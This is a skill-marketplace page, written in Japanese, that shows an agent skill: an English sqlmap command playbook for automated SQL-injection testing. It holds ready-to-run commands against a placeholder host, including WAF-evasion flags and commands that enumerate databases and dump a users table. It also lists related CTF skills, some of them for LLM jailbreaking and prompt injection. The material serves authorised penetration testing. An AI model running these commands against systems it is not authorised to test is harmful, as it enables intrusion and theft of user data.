本文へ移動
cccskills
無料GitHub で公開

Strix•sqlmap 用法

Strix sqlmap 命令手册,覆盖目标语法、无交互执行与常见枚举流程;触发名:strix-sqlmap

インストール方法を見る

含まれるファイル(1)

  • SKILL.md2.8 KB

SKILL.md(原文)

インストールする前に、エージェントに与えられる指示の中身を確認できます。

sqlmap CLI Playbook

Official docs:

Canonical syntax: sqlmap -u "<target_url_with_params>" [options]

High-signal flags:

  • -u, --url <url> target URL
  • -r <request_file> raw HTTP request input
  • -p <param> test specific parameter(s)
  • --batch non-interactive mode
  • --level <1-5> test depth
  • --risk <1-3> payload risk profile
  • --threads <n> concurrency
  • --technique <letters> technique selection
  • --forms parse and test forms from target page
  • --cookie <cookie> and --headers <headers> authenticated context
  • --timeout <seconds> and --retries <n> transport stability
  • --tamper <scripts> WAF/input-filter evasion
  • --random-agent randomize user-agent
  • --ignore-proxy bypass configured proxy
  • --dbs, -D <db> --tables, -D <db> -T <table> --columns, -D <db> -T <table> -C <cols> --dump
  • --flush-session clear cached scan state

Agent-safe baseline for automation: sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5 --timeout 10 --retries 1 --random-agent

Common patterns:

  • Baseline injection check: sqlmap -u "https://target.tld/item?id=1" -p id --batch --level 2 --risk 1 --threads 5
  • POST parameter testing: sqlmap -u "https://target.tld/login" --data "user=admin&pass=test" -p pass --batch --level 2 --risk 1
  • Form-driven testing: sqlmap -u "https://target.tld/login" --forms --batch --level 2 --risk 1 --random-agent
  • Enumerate DBs: sqlmap -u "https://target.tld/item?id=1" -p id --batch --dbs
  • Enumerate tables in DB: sqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb --tables
  • Dump selected columns: sqlmap -u "https://target.tld/item?id=1" -p id --batch -D appdb -T users -C id,email,role --dump

Critical correctness rules:

  • Always include --batch in automation to avoid interactive prompts.
  • Keep target parameter explicit with -p when possible.
  • Use --flush-session when retesting after request/profile changes.
  • Start conservative (--level 1-2, --risk 1) and escalate only when needed.

Usage rules:

  • Keep authenticated context (--cookie/--headers) aligned with manual validation state.
  • Prefer narrow extraction (-D/-T/-C) over broad dump-first behavior.
  • Do not use -h/--help during normal execution unless absolutely necessary.

Failure recovery:

  • If results conflict with manual testing, rerun with --flush-session.
  • If blocked by filtering/WAF, reduce --threads and test targeted --tamper chains.
  • If initial detection misses likely injection, increment --level/--risk gradually.

If uncertain, query web_search with: site:github.com/sqlmapproject/sqlmap/wiki/usage sqlmap <flag>

レビュー

まだレビューはありません。使ってみた感想をお寄せください。

同じリポジトリのスキル

概要と使いどころ

用于对抗样本、模型提取、提示注入、成员推断、训练投毒、LoRA 滥用、LLM 越狱等 AI/ML 相关 CTF 题;触发名:ctf-ai-ml

日本語の概要は準備中です。原文の説明を表示しています。

asdfgh1445/ctf-super-hub8362026年10月2日 更新

用于 XSS、SQL 注入、SSTI、SSRF、XXE、JWT、鉴权绕过、文件上传、请求走私、OAuth/OIDC、SAML 与原型污染等 Web 类 CTF 题;触发名:ctf-web

日本語の概要は準備中です。原文の説明を表示しています。

asdfgh1445/ctf-super-hub8362026年10月2日 更新

用于缓冲区溢出、格式化字符串、堆利用、ROP、ret2libc、shellcode、内核利用、seccomp 绕过与沙箱逃逸等 pwn 类 CTF 题;触发名:ctf-pwn

日本語の概要は準備中です。原文の説明を表示しています。

asdfgh1445/ctf-super-hub8362026年10月2日 更新

用于 RSA、AES、ECC、格攻击、LWE、CVP、Coppersmith、Pollard、Wiener、填充预言机、GCM、KDF、伪随机数与零知识证明等密码学和数学类 CTF 题;触发名:ctf-crypto

日本語の概要は準備中です。原文の説明を表示しています。

asdfgh1445/ctf-super-hub8362026年10月2日 更新

用于公开资料检索、社交媒体分析、地理定位、DNS、用户名枚举、反向图片搜索、历史快照、公开记录与坐标识别等 OSINT 类 CTF 题;触发名:ctf-osint

日本語の概要は準備中です。原文の説明を表示しています。

asdfgh1445/ctf-super-hub8362026年10月2日 更新

用于混淆脚本、恶意样本、自定义加密协议、C2 流量、PE/.NET 二进制、RC4/AES 通信、YARA、shellcode、进程注入与反分析等恶意软件类 CTF 题;触发名:ctf-malware

日本語の概要は準備中です。原文の説明を表示しています。

asdfgh1445/ctf-super-hub8362026年10月2日 更新

asdfgh1445 のスキルをすべて見る

このスキルの問題を報告する